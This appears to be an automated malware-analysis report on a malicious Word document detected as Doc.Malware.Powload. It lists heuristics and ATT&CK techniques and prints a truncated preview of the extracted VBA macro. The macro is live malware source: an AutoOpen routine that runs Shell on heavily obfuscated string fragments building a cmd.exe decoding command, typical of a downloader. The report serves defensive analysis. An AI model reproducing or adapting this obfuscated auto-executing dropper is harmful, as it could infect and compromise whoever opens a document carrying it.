MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature 'Doc.Malware.Powload-6803987-0'. It contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro attempts to construct and execute a command using obfuscated string concatenations, indicative of a downloader or initial execution stage for a more complex payload.
Heuristics 5
-
ClamAV: Doc.Malware.Powload-6803987-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6803987-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11897 bytes |
SHA-256: c640daf1e506c6425441b734511d612476c53aa855b5c456d52447d4abc9c52d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "SNMMFrcLz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName jcmNU
TypeName CByte(792)
TypeName 98
TypeName 54
TypeName Int(AwFmf + 44329)
TypeName 956
Shell@ KeyString(vbKeyC) + hpbOtaDTutG + IQJwXTRPhGXIjz + jClDjAwt + IDnZjzbZlRA + wWNPQ + PMZEPolIY + XMldwk + awqiMtXqCpr + cskwIK + ijtPopSrF + vLzBCvfdzKVS + QAiEFKcDHu, 893070038 - 893070038
TypeName Sin(9)
TypeName 9706
TypeName CInt(RlYiis)
End Sub
Attribute VB_Name = "hFUNDTC"
Function jClDjAwt()
On Error Resume Next
TypeName Sgn(34568109)
TypeName Oct(WvzhE)
TypeName CSng(GADMq / PTnKVF)
hcjKD = "md" + " " + "/V:" + "O/" + "C" + CStr(Chr(YTIvHEAO + irNXzvEmPKFis + 34 + cVaEijjdwSpv + XcQPNKEBUa)) + "s" + "e" + "t" + " - " + " " + "=I"
TypeName Int(88630 - PNFWc)
TypeName jYDfi
qBKhHPh = "dBS" + "Z" + "aVl" + "EV" + "EJw" + "pR" + "Gp" + "McX" + "USa" + "hl" + "Er"
TypeName 923
TypeName Sqr(8)
TypeName pmjcBZ
fZpof = "h" + "l" + "Bw" + "sz " + "7+" + "Wi" + ";mN" + "9" + "qC"
TypeName TAwmG
TypeName 47
TypeName Fix(wnwkP)
MwTPcZQ = ".@," + "\Pk" + "}t" + "Qb'" + "j26" + "=" + "oT)" + "fDy" + ":"
TypeName Cos(zCHfDT + sPvuR)
TypeName CDbl(8)
TypeName hkqWXA
wNpjUc = "/" + "nue" + "{F" + "4" + "Hv1" + "$(-"
TypeName 385
TypeName qXbdN
TypeName CByte(WooEZ)
EvQTXVCAbNs = "x" + "&" + "&f" + "o" + "r " + "%o" + " i" + "n " + "(" + "1" + "6,"
jClDjAwt = hcjKD + qBKhHPh + fZpof + MwTPcZQ + wNpjUc + EvQTXVCAbNs
TypeName Sgn(22)
TypeName Cos(11105 / Kiuuz + 34505 + YQDlwM)
TypeName 85
End Function
Function IDnZjzbZlRA()
On Error Resume Next
TypeName 94
TypeName Hex(59353 / oqwpb + ODXqTX - cOmVb)
TypeName Round(604)
PzFMCz = "59," + "30" + ",69" + "," + "26" + "," + "31," + "2" + "7,6"
TypeName Sqr(44066 - AjAFb)
TypeName Atn(sTPiO)
TypeName CStr(46398 / qWVWR)
vfvtaYo = "9" + ",28" + ",28" + ",33" + ",7" + "6," + "53," + "37" + ",5" + "9,"
TypeName 2121
TypeName Int(bUzTjh)
oKCGnc = "5" + "8" + "," + "67," + "69" + "," + "30," + "78," + "59" + "," + "5" + "3," + "5"
TypeName jpMpWD
TypeName cIMII
TypeName Sin(OzzBmK)
nucuuL = "5,6" + "9," + "1" + "8," + "51," + "33,"
TypeName 392766598
TypeName BDwMkj
TypeName Atn(38471 + HSEZIR + 65698 - 47989)
AqwZASd = "40," + "69," + "51" + "," + "4" + "4,3" + "6" + ",6" + "9,5" + "3," + "4"
TypeName Int(ipJPvG)
TypeName CLng(jaoqfT)
TypeName CDbl(fpHWZV)
wMcGGLpzN = "3," + "28," + "3" + "7," + "69,"
TypeName 185071801
TypeName 3
sobPaTkAi = "6" + "7," + "51," + "3" + "8" + ",7" + "6," + "26" + ",67" + ",9" + ",58" + ",54"
TypeName 4638
TypeName CDate(YZNin / nzCJTj)
urNOJkc = ",27" + "," + "5" + "1" + "," + "51" + ",1" + "6,6" + "5," + "66," + "6"
TypeName Hex(aUbiDQ)
TypeName 9132
KuKoViEL = "6" + ",5" + "3,2" + "2,3" + "2," + "2" + "2,7" + "8" + "," + "31" + ",27"
TypeName 6
TypeName rGQto
TypeName Int(LbjZZ)
PzJwl = "," + "22" + ",2" + "6," + "51," + "2" + "2" + "," + "31"
TypeName CSng(9827 + 97243)
TypeName UHGQi
DzLpJLO = ",2" + "7" + ",4" + "4," + "26" + "," + "6" + "8," + "66" + ",2" + "7," + "49"
TypeName Fix(rIkUQn * UdMQcj)
TypeName 36033102
cQhMOijFlw = ",4" + "2," + "19," + "42," + "6" + "0," + "75," + "4" + "5" + ",2" + "7," + "5" + "1"
IDnZjzbZlRA = PzFMCz + vfvtaYo + oKCGnc + nucuuL + AqwZASd + wMcGGLpzN + sobPaTkAi + urNOJkc + KuKoViEL + PzJwl + DzLpJLO + cQhMOijFlw
TypeName ThjpCw
TypeName Atn(FlNvzi)
TypeName Chr(6531)
End Function
Function wWNPQ()
On Error Resume Next
TypeName Fix(EHmAFw)
TypeName Atn(566)
YsSVTiw = "," + "51," + "16" + ",6" + "5,6" + "6" + ",6" + "6," + "22" + ",67" + "," + "22,"
TypeName 291016583
TypeName Log(hikYU + UoEpK)
GkdUzsVD = "16" + ",2" + "2" + "," + "1" + "6,5"
TypeName Sqr(iEGiO)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.